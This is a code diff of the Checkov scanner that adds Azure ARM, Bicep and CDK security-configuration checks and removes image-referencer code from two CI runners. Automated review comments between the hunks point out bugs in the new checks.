diff --git a/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py b/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py new file mode 100644 index 00000000000..bfff551fa39 --- /dev/null +++ b/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py @@ -0,0 +1,23 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck + + +class SynapseWorkspaceAdministratorLoginPasswordHidden(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure Azure Synapse Workspace administrator login password is not exposed" + id = "CKV_AZURE_239" + supported_resources = ['Microsoft.Synapse/workspaces'] + categories = [CheckCategories.SECRETS] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + if conf.get("properties", {}).get("sqlAdministratorLoginPassword"): + return CheckResult.FAILED + return CheckResult.PASSED + + +check = SynapseWorkspaceAdministratorLoginPasswordHidden() diff --git a/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py b/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py new file mode 100644 index 00000000000..225c6ee31c9 --- /dev/null +++ b/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py 
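Review bot: `scan_resource_conf` fails on any non-empty `sqlAdministratorLoginPassword`, including a reference to a secure parameter such as `[parameters('sqlAdminPassword')]`, which is the recommended way to supply that value in an ARM template and exposes nothing; correctly written templates will therefore fail this check. Treating values that start with `[` as unresolved expressions (PASSED or UNKNOWN) and reserving FAILED for literal values, or running the literal through `string_has_secrets` as VMCredsInCustomData does in this same commit, keeps the check focused on actual exposure. `conf.get("properties", {}).get(...)` also raises if `properties` resolves to something other than a dict, so an `isinstance` guard like the one in VMCredsInCustomData would be consistent.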
@@ -0,0 +1,24 @@ +from __future__ import annotations +from typing import Any +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.models.enums import CheckResult, CheckCategories + + +class SynapseWorkspaceCMKEncryption(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure Azure Synapse Workspace is encrypted with a CMK" + id = "CKV_AZURE_240" + supported_resources = ['Microsoft.Synapse/workspaces'] + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + encryption = conf.get("properties", {}).get("encryption", {}) + + if "cmk" in encryption: + return CheckResult.PASSED + + return CheckResult.FAILED + + +check = SynapseWorkspaceCMKEncryption() diff --git a/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py b/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py new file mode 100644 index 00000000000..1705ad191e5 --- /dev/null +++ b/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py @@ -0,0 +1,17 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class SynapseWorkspaceEnablesDataExfilProtection(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Synapse workspace has data_exfiltration_protection_enabled" + id = "CKV_AZURE_157" + supported_resources = ["Microsoft.Synapse/workspaces"] + categories = [CheckCategories.GENERAL_SECURITY] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return 'properties/dataExfiltrationProtectionEnabled' + + +check = SynapseWorkspaceEnablesDataExfilProtection() 
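Review bot: `"cmk" in encryption` passes on `encryption: {"cmk": {}}`, where no key is actually configured, and if `encryption` resolves to a string the `in` test becomes a substring match rather than a key lookup. `if isinstance(encryption, dict) and encryption.get("cmk"): return CheckResult.PASSED` requires a populated block and avoids the string case. A short comment naming what a populated `cmk` block must contain for the encryption to be effective would make the pass condition reviewable.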
diff --git a/checkov/arm/checks/resource/VMCredsInCustomData.py b/checkov/arm/checks/resource/VMCredsInCustomData.py new file mode 100644 index 00000000000..281710a675a --- /dev/null +++ b/checkov/arm/checks/resource/VMCredsInCustomData.py @@ -0,0 +1,32 @@ +from typing import List, Dict, Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.common.util.secrets import string_has_secrets +from checkov.arm.base_resource_value_check import BaseResourceCheck + + +class VMCredsInCustomData(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure that no sensitive credentials are exposed in VM custom_data" + id = "CKV_AZURE_45" + supported_resources = ("Microsoft.Compute/virtualMachines",) + categories = (CheckCategories.SECRETS,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,) + + def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult: + properties = conf.get("properties") + if properties and isinstance(properties, dict): + os_profile = properties.get("osProfile") + if isinstance(os_profile, dict): + custom_data = os_profile.get("customData") + if isinstance(custom_data, str): + if string_has_secrets(custom_data): + conf[f'{self.id}_secret'] = custom_data + return CheckResult.FAILED + return CheckResult.PASSED + + def get_evaluated_keys(self) -> List[str]: + return ["properties/osProfile/customData"] + + +check = VMCredsInCustomData() diff --git a/checkov/arm/checks/resource/VMStorageOsDisk.py b/checkov/arm/checks/resource/VMStorageOsDisk.py new file mode 100644 index 00000000000..50a4a1d5d84 --- /dev/null +++ b/checkov/arm/checks/resource/VMStorageOsDisk.py 
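Review bot: `BaseResourceCheck` is imported from `checkov.arm.base_resource_value_check` here (and again in VMStorageOsDisk in the next hunk), whereas every other check in this commit imports it from `checkov.arm.base_resource_check`; this only works through a transitive import and will break if that module stops re-exporting it. Use `from checkov.arm.base_resource_check import BaseResourceCheck` in both files. Separately, `customData` on an ARM virtual machine is expected to be base64-encoded, so `string_has_secrets` is scanning the encoded form and plain-text credential patterns inside it will not match; if the helper does not decode, decoding with `base64.b64decode` (on success) before scanning is worth considering, and the limitation should at least be noted in a comment.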
@@ -0,0 +1,36 @@ +from typing import Any, Dict + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceCheck + + +class VMStorageOsDisk(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure that Virtual Machines use managed disks" + id = "CKV_AZURE_92" + supported_resources = ("Microsoft.Compute/virtualMachines",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult: + properties = conf.get('properties') + if not properties or not isinstance(properties, dict): + return CheckResult.PASSED + storage_profile = properties.get('storageProfile') + if not storage_profile or not isinstance(storage_profile, dict): + return CheckResult.PASSED + os_disk = storage_profile.get('osDisk') + data_disks = list(storage_profile.get('dataDisks', [])) + if os_disk and isinstance(os_disk, dict) and "vhd" in os_disk: + self.evaluated_keys = ['os_disk'] + return CheckResult.FAILED + if data_disks and any(isinstance(data_disk, dict) and "vhd" in data_disk for data_disk in data_disks): + self.evaluated_keys = ['data_disks'] + return CheckResult.FAILED + self.evaluated_keys = ['os_disk'] if os_disk else [] + if data_disks: + self.evaluated_keys.append('data_disks') + return CheckResult.PASSED + + +check = VMStorageOsDisk() diff --git a/checkov/arm/checks/resource/VnetLocalDNS.py b/checkov/arm/checks/resource/VnetLocalDNS.py new file mode 100644 index 00000000000..d3687483afa --- /dev/null +++ b/checkov/arm/checks/resource/VnetLocalDNS.py 
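Review bot: `self.evaluated_keys` is set to the Terraform attribute names `os_disk` and `data_disks`, which do not exist in an ARM template, so the report points at keys the user cannot find; VMCredsInCustomData in this commit returns the ARM path `properties/osProfile/customData` for the same purpose. The matching values here are `properties/storageProfile/osDisk` and `properties/storageProfile/dataDisks`. A docstring stating that an unmanaged `vhd` block on either the OS disk or any data disk fails the check would also help, since that rule is only visible from the two `"vhd" in ...` tests.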
@@ -0,0 +1,48 @@ +from ipaddress import ip_network, ip_address +from typing import Any, List, Dict + +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.models.enums import CheckCategories, CheckResult + + +class VnetLocalDNS(BaseResourceCheck): + def __init__(self) -> None: + """Avoid taking a dependency on external DNS servers + for local communication such as those deployed on-premises. + Where possible consider deploying Azure Private DNS Zones, + a platform-as-a-service (PaaS) DNS service for VNETs""" + + name = "Ensure that VNET uses local DNS addresses" + id = "CKV_AZURE_183" + supported_resources = ("Microsoft.Network/virtualNetworks",) + categories = [CheckCategories.NETWORKING, ] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, Dict[str, Dict[str, List[Any]]]]) -> CheckResult: + if "properties" in conf and "dhcpOptions" in conf["properties"]: + if "dnsServers" in conf["properties"]["dhcpOptions"]: + if isinstance(conf["properties"]["dhcpOptions"]["dnsServers"], list): + dns_servers = conf["properties"]["dhcpOptions"]["dnsServers"] + if dns_servers: + for ip in dns_servers: + if "addressSpace" in conf["properties"] and conf["properties"]["addressSpace"]: + if "addressPrefixes" in conf["properties"]["addressSpace"]: + if isinstance(conf["properties"]["addressSpace"]["addressPrefixes"], list): + address_spaces = conf["properties"]["addressSpace"]["addressPrefixes"] + if isinstance(address_spaces, list): + for address_range in address_spaces: + if not isinstance(address_range, str): + continue + try: + net = ip_network(address_range) + ip_add = ip_address(ip) if isinstance(ip, str) else None + except ValueError: + return CheckResult.UNKNOWN + if isinstance(ip, str) and ip_add in net: + return CheckResult.PASSED + self.evaluated_keys = ["dnsServers"] + return CheckResult.FAILED + return CheckResult.PASSED + + +check = 
VnetLocalDNS() diff --git a/checkov/arm/checks/resource/VnetSingleDNSServer.py b/checkov/arm/checks/resource/VnetSingleDNSServer.py new file mode 100644 index 00000000000..e449b388359 --- /dev/null +++ b/checkov/arm/checks/resource/VnetSingleDNSServer.py @@ -0,0 +1,37 @@ +from typing import Any, List, Dict + +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.models.enums import CheckCategories, CheckResult + + +class VnetSingleDNSServer(BaseResourceCheck): + + def __init__(self) -> None: + """Using a single DNS server may indicate a single point of failure + where the DNS IP address is not load balanced.""" + name = "Ensure that VNET has at least 2 connected DNS Endpoints" + id = "CKV_AZURE_182" + supported_resources = ("Microsoft.Network/networkInterfaces", "Microsoft.Network/virtualNetworks") + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, Dict[str, Dict[str, List[Any]]]]) -> CheckResult: + if "properties" in conf and "dnsSettings" in conf["properties"]: + if "dnsServers" in conf["properties"]["dnsSettings"] and isinstance( + conf["properties"]["dnsSettings"]["dnsServers"], list): + dns_servers = conf["properties"]["dnsSettings"]["dnsServers"] + if dns_servers and len(dns_servers) == 1: + self.evaluated_keys = ["dnsServers"] + return CheckResult.FAILED + else: + if "properties" in conf and "dhcpOptions" in conf["properties"]: + if "dnsServers" in conf["properties"]["dhcpOptions"] and isinstance( + conf["properties"]["dhcpOptions"]["dnsServers"], list): + dns_servers = conf["properties"]["dhcpOptions"]["dnsServers"] + if dns_servers and len(dns_servers) == 1: + self.evaluated_keys = ["dnsServers"] + return CheckResult.FAILED + return CheckResult.PASSED + + +check = VnetSingleDNSServer() 
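Review bot: `scan_resource_conf` returns PASSED on the first DNS server that falls inside any `addressPrefixes` entry, so a `dnsServers` list that mixes one local resolver with external ones passes, which does not appear to match the "uses local DNS addresses" intent; if every resolver should be local, collect the results and fail as soon as one address is outside all prefixes. The check also returns UNKNOWN on the first unparsable prefix or address, which is reasonable but should be stated in a comment since it silently ends evaluation. `self.evaluated_keys = ["dnsServers"]` is not a path; `properties/dhcpOptions/dnsServers` is what the report should point at, and the nine levels of nesting would read far better as early `return CheckResult.PASSED` guards. The same bare `"dnsServers"` evaluated key appears in VnetSingleDNSServer in the next hunk.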
diff --git a/checkov/arm/checks/resource/WinVMAutomaticUpdates.py b/checkov/arm/checks/resource/WinVMAutomaticUpdates.py new file mode 100644 index 00000000000..ecbe38ee424 --- /dev/null +++ b/checkov/arm/checks/resource/WinVMAutomaticUpdates.py @@ -0,0 +1,20 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class WinVMAutomaticUpdates(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure Windows VM enables automatic updates" + id = "CKV_AZURE_177" + supported_resources = ("Microsoft.Compute/virtualMachines", "Microsoft.Compute/virtualMachineScaleSets") + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED,) + + def get_inspected_key(self) -> str: + if self.entity_type == "Microsoft.Compute/virtualMachineScaleSets": + return "properties/virtualMachineProfile/osProfile/windowsConfiguration/enableAutomaticUpdates" + return "properties/osProfile/windowsConfiguration/enableAutomaticUpdates" + + +check = WinVMAutomaticUpdates() diff --git a/checkov/azure_pipelines/image_referencer/manager.py b/checkov/azure_pipelines/image_referencer/manager.py deleted file mode 100644 index e87cd8f9955..00000000000 --- a/checkov/azure_pipelines/image_referencer/manager.py +++ /dev/null 
@@ -1,13 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.azure_pipelines.image_referencer.provider import AzurePipelinesProvider -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager - - -class AzurePipelinesImageReferencerManager(WorkflowImageReferencerManager): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path) - super().__init__(workflow_config, file_path, provider) diff --git a/checkov/azure_pipelines/image_referencer/provider.py b/checkov/azure_pipelines/image_referencer/provider.py deleted file mode 100644 index 7bd00e0bf6f..00000000000 --- a/checkov/azure_pipelines/image_referencer/provider.py +++ /dev/null 
@@ -1,71 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.images.image_referencer import Image -from checkov.azure_pipelines.common.resource_id_utils import generate_resource_key_recursive -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider - - -class AzurePipelinesProvider(WorkflowImageReferencerProvider): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - super().__init__(workflow_config, file_path) - self.supported_keys = "container" - - def extract_images_from_workflow(self) -> list[Image]: - """ - We use a general extraction in azure_pipelines because we can display images in different ways: - - container - - container.image - - resources.containers[].container... - - jobs[].container... - - jobs[].steps.task.inputs.container... - - jobs[].strategy.container... - - stages[].jobs[]... - """ - images = self.extract_images_from_dict(self.workflow_config) - return images - - def extract_images_from_list(self, objects_list: list[dict[str, Any]]) -> list[Image]: - images = [] - for job in objects_list: - if isinstance(job, dict): - images.extend(self.extract_images_from_dict(job)) - if isinstance(job, list): - images.extend(self.extract_images_from_list(job)) - return images - - def extract_images_from_dict(self, job: dict[str, Any]) -> list[Image]: - images = [] - start_line, end_line = AzurePipelinesProvider._get_start_end_lines(job) - for key, sub_job in job.items(): - if key == self.supported_keys: - image = self.create_image(sub_job, start_line, end_line) - if image: - images.append(image) - elif isinstance(sub_job, dict): - images.extend(self.extract_images_from_dict(sub_job)) - elif isinstance(sub_job, list): - images.extend(self.extract_images_from_list(sub_job)) - return images - - def create_image(self, container: dict[str, Any] | str, start_line: int, end_line: int) -> Image | None: - image_name = '' - if isinstance(container, str): - 
image_name = container - elif isinstance(container, dict): - if 'image' in container: - image_name = container['image'] - related_resource_id = generate_resource_key_recursive(file_conf=self.workflow_config, - resource_key='', - start_line=start_line, - end_line=end_line) - if image_name and related_resource_id: - return Image( - file_path=self.file_path, - name=image_name, - start_line=start_line, - end_line=end_line, - related_resource_id=related_resource_id) - return None diff --git a/checkov/azure_pipelines/runner.py b/checkov/azure_pipelines/runner.py index baf6a8535c5..2ff89a2c387 100644 --- a/checkov/azure_pipelines/runner.py +++ b/checkov/azure_pipelines/runner.py @@ -1,24 +1,19 @@ from __future__ import annotations -import os from typing import TYPE_CHECKING, Any, Optional from checkov.azure_pipelines.checks.registry import registry from checkov.azure_pipelines.common.resource_id_utils import generate_resource_key_recursive -from checkov.azure_pipelines.image_referencer.manager import AzurePipelinesImageReferencerManager -from checkov.common.images.image_referencer import ImageReferencerMixin, Image from checkov.common.output.report import CheckType, Report from checkov.runner_filter import RunnerFilter from checkov.yaml_doc.runner import Runner as YamlRunner - if TYPE_CHECKING: from checkov.common.checks.base_check_registry import BaseCheckRegistry from collections.abc import Iterable - from networkx import DiGraph -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.AZURE_PIPELINES # noqa: CCE003 # a static attribute def require_external_checks(self) -> bool: 
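Review bot: `Any` on the kept `from typing import TYPE_CHECKING, Any, Optional` line may now be unused, because the only visible users — the `ImageReferencerMixin[...]` generic argument removed here and the `extract_images` signature removed in the next hunk — are gone; flake8 is enabled in this repository and would report it as F401 if nothing else in the file uses it. Drop it from the import if so; the rest of the file is outside this hunk, so I cannot confirm from here.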
@@ -57,43 +52,4 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions - ) - - if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list - return report - - def extract_images( - self, - graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions: - return images - - for file, config in definitions.items(): - if isinstance(config, list): - continue - is_container = False - for row in self.definitions_raw.get(file, []): - if 'container' in row[1]: - is_container = True - break - if not is_container: - return images - manager = AzurePipelinesImageReferencerManager(workflow_config=config, file_path=file) - images.extend(manager.extract_images_from_workflow()) - - return images diff --git a/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml b/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml new file mode 100644 index 00000000000..8283ee5d3bf --- /dev/null +++ b/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml 
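Review bot: With the image-referencer branch removed, `run` now always returns `report`, so the return annotation on its signature (above this hunk) can probably be narrowed from a `Report | list[Report]`-style union to plain `Report`, and the `# type:ignore[list-item]` that only the removed line carried no longer needs a counterpart. Check the declared return type of `YamlRunner.run` before narrowing, since neither signature is visible here. The body of `run` begins outside the hunk.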
@@ -0,0 +1,34 @@ +metadata: + id: "CKV_AZURE_24" + name: "Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers" + category: "LOGGING" +definition: + and: + - cond_type: "filter" + attribute: "resource_type" + value: + - "Microsoft.Sql/servers" + operator: "within" + - cond_type: "connection" + resource_types: + - "Microsoft.Sql/servers" + connected_resource_types: + - "Microsoft.Sql/servers/auditingSettings" + operator: "exists" + - cond_type: "attribute" + resource_types: + - "Microsoft.Sql/servers/auditingSettings" + attribute: "properties.retentionDays" + operator: "exists" + - cond_type: "attribute" + resource_types: + - "Microsoft.Sql/servers/auditingSettings" + attribute: "properties.retentionDays" + operator: "greater_than_or_equal" + value: 90 + - cond_type: "attribute" + resource_types: + - "Microsoft.Sql/servers/auditingSettings" + attribute: "properties.state" + operator: "equals" + value: Enabled diff --git a/checkov/bitbucket_pipelines/runner.py b/checkov/bitbucket_pipelines/runner.py index 9114527adba..3f617c8768a 100644 --- a/checkov/bitbucket_pipelines/runner.py +++ b/checkov/bitbucket_pipelines/runner.py @@ -1,11 +1,8 @@ from __future__ import annotations -from typing import Any, TYPE_CHECKING, cast - -import jmespath +from typing import Any, TYPE_CHECKING from checkov.bitbucket_pipelines.registry import registry -from checkov.common.images.image_referencer import ImageReferencer, Image from checkov.common.bridgecrew.check_type import CheckType from checkov.yaml_doc.runner import Runner as YamlRunner @@ -13,7 +10,7 @@ from checkov.common.checks.base_check_registry import BaseCheckRegistry -class Runner(YamlRunner, ImageReferencer): +class Runner(YamlRunner): check_type = CheckType.BITBUCKET_PIPELINES # noqa: CCE003 # a static attribute def __init__(self) -> None: 
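Review bot: The `greater_than_or_equal` 90 condition on `properties.retentionDays` fails `retentionDays: 0`, which the Azure SQL auditing resource documents as unlimited retention rather than none — verify, but if so the strictest configuration is reported as non-compliant. If this Bicep check is meant to mirror the existing CKV_AZURE_24 behaviour, add an `or` branch with `operator: "equals"` and `value: 0`, otherwise document the choice in a comment above the condition. The title says "greater than 90 days" while the operator accepts exactly 90; align one with the other.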
@@ -25,15 +22,6 @@ def require_external_checks(self) -> bool: def import_registry(self) -> BaseCheckRegistry: return registry - @staticmethod - def _parse_file( - f: str, file_content: str | None = None - ) -> tuple[dict[str, Any] | list[dict[str, Any]], list[tuple[int, str]]] | None: - if Runner.is_workflow_file(f): - return YamlRunner._parse_file(f) - - return None - @staticmethod def is_workflow_file(file_path: str) -> bool: """ 
@@ -41,103 +29,11 @@ def is_workflow_file(file_path: str) -> bool: """ return file_path.endswith(("bitbucket-pipelines.yml", "bitbucket-pipelines.yaml")) - def get_images(self, file_path: str) -> set[Image]: - """ - Get container images mentioned in a file - :param file_path: File to be inspected - - File sample that will return 4 Image objects: - #image: node:10.15.0 - # - #pipelines: - # default: - # - step: - # name: Build and test - # image: node:10.0.0 - # script: - # - npm install - # - npm test - # - npm run build - # artifacts: - # - dist/** - # - step: - # name: Deploy - # image: python:3.7.2 - # trigger: manual - # script: - # - python deploy.py - # custom: - # sonar: - # - step: - # image: python:3.8.2 - # script: - # - echo "Manual triggers for Sonar are awesome!" - # deployment-to-prod: - # - step: - # script: - # - echo "Manual triggers for deployments are awesome!" - # branches: - # staging: - # - step: - # script: - # - echo "Auto pipelines are cool too." - :return: List of container image objects mentioned in the file. 
- - """ - - images: set[Image] = set() - parsed_file = self._parse_file(file_path) - - if not parsed_file: - return images - - workflow, workflow_line_numbers = parsed_file - - if not isinstance(workflow, dict): - # make type checking happy - return images - - self.add_default_and_pipelines_images(workflow, images, file_path) - self.add_root_image(file_path, images, workflow_line_numbers, workflow) - - return images - - def add_default_and_pipelines_images(self, workflow: dict[str, Any], images: set[Image], file_path: str) -> None: - """ - - :param workflow: parsed workflow file - :param images: set of images to be updated - :param file_path: path of analyzed workflow - """ - keywords = [ - "pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__}", - "pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__}", - ] - for keyword in keywords: - results = cast("list[dict[str, Any]]", jmespath.search(keyword, workflow)) - for result in results: - image_name = result.get("image", None) - if image_name: - image_obj = Image( - file_path=file_path, - name=image_name, - start_line=result["__startline__"], - end_line=result["__endline__"], - ) - images.add(image_obj) - - def add_root_image( - self, file_path: str, images: set[Image], workflow_line_numbers: list[tuple[int, str]], workflow: dict[str, Any] - ) -> None: - root_image = workflow.get("image", "") + @staticmethod + def _parse_file( + f: str, file_content: str | None = None + ) -> tuple[dict[str, Any] | list[dict[str, Any]], list[tuple[int, str]]] | None: + if Runner.is_workflow_file(f): + return YamlRunner._parse_file(f) - if root_image: - for line_number, line_txt in workflow_line_numbers: - if "image" in line_txt and not line_txt.startswith(" "): - image_obj = Image( - file_path=file_path, - name=root_image, - start_line=line_number, - end_line=line_number, - ) - images.add(image_obj) + return None 
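Review bot: The relocated `_parse_file` accepts `file_content` but never passes it on — `return YamlRunner._parse_file(f)` re-reads the file from disk even when a caller already supplied its contents, and the same was true before the move. Forward it: `return YamlRunner._parse_file(f, file_content)`, assuming the base accepts the same second parameter, as the overriding signature suggests. Since the method is otherwise a pure relocation, a docstring such as `"""Parse *f* only if it is a Bitbucket pipelines file; otherwise return None."""` would make the filtering intent explicit.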
diff --git a/checkov/cdk/checks/python/AppSyncFieldLevelLogs.yaml b/checkov/cdk/checks/python/AppSyncFieldLevelLogs.yaml index 514bab9127b..46d0b6b45ac 100644 --- a/checkov/cdk/checks/python/AppSyncFieldLevelLogs.yaml +++ b/checkov/cdk/checks/python/AppSyncFieldLevelLogs.yaml @@ -20,4 +20,4 @@ definition: aws_cdk.aws_appsync.CfnGraphQLApi(, log_config=$LOG , ) - metavariable: $ARG - regex: (ERRORS|ALL) \ No newline at end of file + regex: (ERROR|ALL) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ALBDropHttpHeaders.yaml b/checkov/cdk/checks/typescript/ALBDropHttpHeaders.yaml new file mode 100644 index 00000000000..0f60fc3b4d1 --- /dev/null +++ b/checkov/cdk/checks/typescript/ALBDropHttpHeaders.yaml @@ -0,0 +1,21 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_131 + name: Ensure that ALB drops HTTP headers + category: NETWORKING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnLoadBalancer() + conditions: + - not_pattern: | + new $AWS.CfnLoadBalancer(, { , type: 'application', , loadBalancerAttributes: [, {'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'} ,] }, ) + - not_pattern: | + new $AWS.CfnLoadBalancer(, { , type: 'application', , loadBalancerAttributes: [, {'value': 'true', 'key': 'routing.http.drop_invalid_header_fields.enabled'} ,] }, ) + - not_pattern: | + new $AWS.CfnLoadBalancer(, { , loadBalancerAttributes: [, {'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'} ,], , type: 'application' }, ) + - not_pattern: | + new $AWS.CfnLoadBalancer(, { , loadBalancerAttributes: [, {'value': 'true', 'key': 'routing.http.drop_invalid_header_fields.enabled'} ,], , type: 'application' }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ALBListenerHTTPS.yaml b/checkov/cdk/checks/typescript/ALBListenerHTTPS.yaml new file mode 100644 index 00000000000..c919f3c9455 --- /dev/null 
+++ b/checkov/cdk/checks/typescript/ALBListenerHTTPS.yaml
@@ -0,0 +1,25 @@
+metadata:
+ version: 0.2
+ approach: define failing
+ id: CKV_AWS_2
+ name: Ensure EFS is securely encrypted
+ category: ENCRYPTION
+ framework: cdk
+scope:
+ languages:
+ - typescript
+definition:
+ pattern: new $AWS.CfnListener()
+ conditions:
+ - not_pattern: |
+ new $AWS.CfnListener(, { , protocol: 'HTTPS', }, )
+ - not_pattern: |
+ new $AWS.CfnListener(, { , protocol: 'TLS', }, )
+ - not_pattern: |
+ new $AWS.CfnListener(, { , protocol: 'TCP', }, )
+ - not_pattern: |
+ new $AWS.CfnListener(, { , protocol: 'UDP', }, )
+ - not_pattern: |
+ new $AWS.CfnListener(, { , protocol: 'TCP_UDP', }, )
+ - not_pattern: |
+ new $AWS.CfnListener(, { defaultActions: [, {type: 'redirect', redirectConfig:{protocol: 'HTTPS'}} , ] }, )
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/APIGatewayAccessLogging.yaml b/checkov/cdk/checks/typescript/APIGatewayAccessLogging.yaml
new file mode 100644
index 00000000000..112be450289
--- /dev/null
+++ b/checkov/cdk/checks/typescript/APIGatewayAccessLogging.yaml
@@ -0,0 +1,21 @@
+metadata:
+ version: 0.2
+ approach: define failing
+ id: CKV_AWS_76
+ name: Ensure API Gateway has Access Logging enabled
+ category: LOGGING
+ framework: cdk
+scope:
+ languages:
+ - typescript
+definition:
+ patterns:
+ or:
+ - pattern: new $AWS.CfnStage()
+ conditions:
+ - not_pattern: |
+ new $AWS.CfnStage(, { , accessLogSetting: { , destinationArn: $ARG , }, } , )
+ - pattern: $AWS.Api()
+ conditions:
+ - not_pattern: |
+ new $AWS.Api(, { , accessLogSetting: { , destinationArn: $ARG , }, } , )
diff --git a/checkov/cdk/checks/typescript/APIGatewayAuthorization.yaml b/checkov/cdk/checks/typescript/APIGatewayAuthorization.yaml
new file mode 100644
index 00000000000..4cd8fc043f1
--- /dev/null
+++ b/checkov/cdk/checks/typescript/APIGatewayAuthorization.yaml
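Review bot: `name: Ensure EFS is securely encrypted` under `id: CKV_AWS_2` does not describe this check, which inspects `CfnListener` protocols; it reads as copied from an EFS check and would produce a misleading finding title. Use a title matching what the conditions test and the existing CKV_AWS_2 check, e.g. `name: Ensure ALB protocol is HTTPS`.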
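Review bot: In APIGatewayAccessLogging.yaml the second `or` branch uses `pattern: $AWS.Api()` while its `not_pattern` is `new $AWS.Api(...)`; the other branch and every sibling check pair `new` on both sides. If the pattern engine treats a bare call and a `new` expression differently, the pattern matches something the exclusion never covers, so every `new $AWS.Api(...)` with logging configured could still be flagged; make it `- pattern: new $AWS.Api()` unless the asymmetry is deliberate, in which case a comment should say why.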
@@ -0,0 +1,28 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_59 + name: Ensure there is no open access to back-end resources through API + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: | + const $METHOD = $RESOURCE.addMethod($HTTP_METHOD, , { , apiKeyRequired: false }); + conditions: + - not_pattern: | + const $METHOD = $RESOURCE.addMethod($HTTP_METHOD, , { , authorizationType: $AUTH }); + - metavariable: $AUTH + regex: ($IMPORT.AuthorizationType.COGNITO|$IMPORT.AuthorizationType.IAM|$IMPORT.AuthorizationType.CUSTOM) + - pattern: | + const $METHOD = $RESOURCE.addMethod($HTTP_METHOD, , { , authorizationType: $IMPORT.AuthorizationType.NONE, }); + conditions: + - not_pattern: | + const $METHOD = $RESOURCE.addMethod($HTTP_METHOD, , { , apiKeyRequired: false }); + conditions: + - metavariable: $HTTP_METHOD + not_regex: OPTIONS \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/APIGatewayCacheEnable.yaml b/checkov/cdk/checks/typescript/APIGatewayCacheEnable.yaml new file mode 100644 index 